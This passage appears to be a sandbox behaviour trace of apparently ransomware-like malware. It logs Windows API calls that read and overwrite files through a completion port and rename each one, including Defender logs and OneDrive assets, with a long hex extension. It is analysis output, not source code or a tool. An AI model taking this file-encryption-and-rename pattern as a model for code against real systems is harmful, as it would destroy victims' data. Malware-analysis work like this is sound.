lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.110] WriteFile (in: hFile=0x32c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.111] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.111] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0107.112] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml", lpString2=".1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml.1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml.1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F" [0107.112] GetProcessHeap () returned 0x600000 [0107.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6ee018 [0107.112] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x6ee018, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0107.113] CloseHandle (hObject=0x32c) returned 1 [0107.114] GetProcessHeap () returned 0x600000 [0107.114] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.116] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.155] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.155] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.155] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.156] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.156] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x2b3ff70) returned 0x0 [0107.157] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml", lpString2=".5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.5A652DCBE919F507E7AA061C376886C457F27AF57E0AAD12A6AF4EDE7A11103D" [0107.157] GetProcessHeap () returned 0x600000 [0107.157] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6ee1a0 [0107.157] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6ee1a0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0107.159] CloseHandle (hObject=0x31c) returned 1 [0107.161] GetProcessHeap () returned 0x600000 [0107.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.162] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.168] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.168] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.168] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.169] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.169] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x2b3ff70) returned 0x0 [0107.169] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml", lpString2=".3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.3C3777E125AE6A2A4CC36296C2A12E42EE436C89853FC88C99B08DA8CDA2E24E" [0107.170] GetProcessHeap () returned 0x600000 [0107.170] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6ee328 [0107.170] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6ee328, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0107.171] CloseHandle (hObject=0x31c) returned 1 [0107.172] GetProcessHeap () returned 0x600000 [0107.172] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.173] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.196] ReadFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x6e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0107.196] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.199] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08, nNumberOfBytesToWrite=0x6e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 0x0 [0107.200] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.203] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x2b3ff70) returned 0x0 [0107.203] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml", lpString2=".E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535" [0107.203] GetProcessHeap () returned 0x600000 [0107.203] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6ee638 [0107.203] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6ee638, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0107.204] CloseHandle (hObject=0x31c) returned 1 [0107.206] GetProcessHeap () returned 0x600000 [0107.206] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.207] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.215] ReadFile (in: hFile=0x31c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.215] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.216] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0107.216] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml", lpString2=".2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A" [0107.216] GetProcessHeap () returned 0x600000 [0107.216] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x178) returned 0x6ed870 [0107.217] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x6ed870, Length=0x178, FileInformationClass=0xa) returned 0x0 [0107.217] CloseHandle (hObject=0x31c) returned 1 [0107.218] GetProcessHeap () returned 0x600000 [0107.218] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.219] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.280] ReadFile (in: hFile=0x308, lpBuffer=0x315b140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0107.280] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.281] WriteFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0107.284] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.321] WriteFile (in: hFile=0x32c, lpBuffer=0x3183f08, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 0x0 [0107.321] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.373] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x2b3ff70) returned 0x0 [0107.373] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp", lpString2=".C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62" [0107.373] GetProcessHeap () returned 0x600000 [0107.373] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12e) returned 0x318c980 [0107.373] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x318c980, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0107.374] CloseHandle (hObject=0x308) returned 1 [0107.392] GetProcessHeap () returned 0x600000 [0107.392] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.393] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.410] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0107.411] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\guest.png", lpString2=".011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\guest.png.011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\guest.png.011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219" [0107.411] GetProcessHeap () returned 0x600000 [0107.411] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12e) returned 0x6ef9e0 [0107.411] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x2b3ff60, FileInformation=0x6ef9e0, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0107.412] CloseHandle (hObject=0x314) returned 1 [0107.415] GetProcessHeap () returned 0x600000 [0107.415] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.416] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.902] ReadFile (in: hFile=0x32c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0107.903] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.903] WriteFile (in: hFile=0x32c, lpBuffer=0x315b140, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 0x0 [0107.904] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.904] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x2b3ff70) returned 0x0 [0107.905] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log", lpString2=".1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log.1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log.1A4C5916F0518D555C60199E08B5A97240A621E94AC1FE8B301D6767A405BD1E" [0107.905] GetProcessHeap () returned 0x600000 [0107.905] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x154) returned 0x6eff58 [0107.905] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x6eff58, Length=0x154, FileInformationClass=0xa) returned 0x0 [0107.906] CloseHandle (hObject=0x32c) returned 1 [0107.908] GetProcessHeap () returned 0x600000 [0107.908] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.909] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.911] WriteFile (in: hFile=0x310, lpBuffer=0x6a2490*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x682358 | out: lpBuffer=0x6a2490*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x682358) returned 1 [0107.911] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0111.313] ReadFile (in: hFile=0x318, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0111.313] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0111.319] WriteFile (in: hFile=0x318, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0111.320] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0111.321] WriteFile (in: hFile=0x330, lpBuffer=0x32e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 1 [0111.322] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.266] WriteFile (in: hFile=0x334, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0112.268] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.345] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2b3ff70) returned 0x0 [0112.345] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png", lpString2=".F7A0F56AF34C3671328862B7FE4F4E5635959556FC14BED5A02DF30B25EECE5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png.F7A0F56AF34C3671328862B7FE4F4E5635959556FC14BED5A02DF30B25EECE5E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png.F7A0F56AF34C3671328862B7FE4F4E5635959556FC14BED5A02DF30B25EECE5E" [0112.345] GetProcessHeap () returned 0x600000 [0112.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x3186e58 [0112.345] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2b3ff60, FileInformation=0x3186e58, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0112.347] CloseHandle (hObject=0x328) returned 1 [0112.347] GetProcessHeap () returned 0x600000 [0112.347] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.349] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.350] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2b3ff70) returned 0x0 [0112.350] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif", lpString2=".498B9B206FFDD5F3F22095314A4929F30DB64D1C1175364D6D1238F9D4584F4E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif.498B9B206FFDD5F3F22095314A4929F30DB64D1C1175364D6D1238F9D4584F4E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif.498B9B206FFDD5F3F22095314A4929F30DB64D1C1175364D6D1238F9D4584F4E" [0112.350] GetProcessHeap () returned 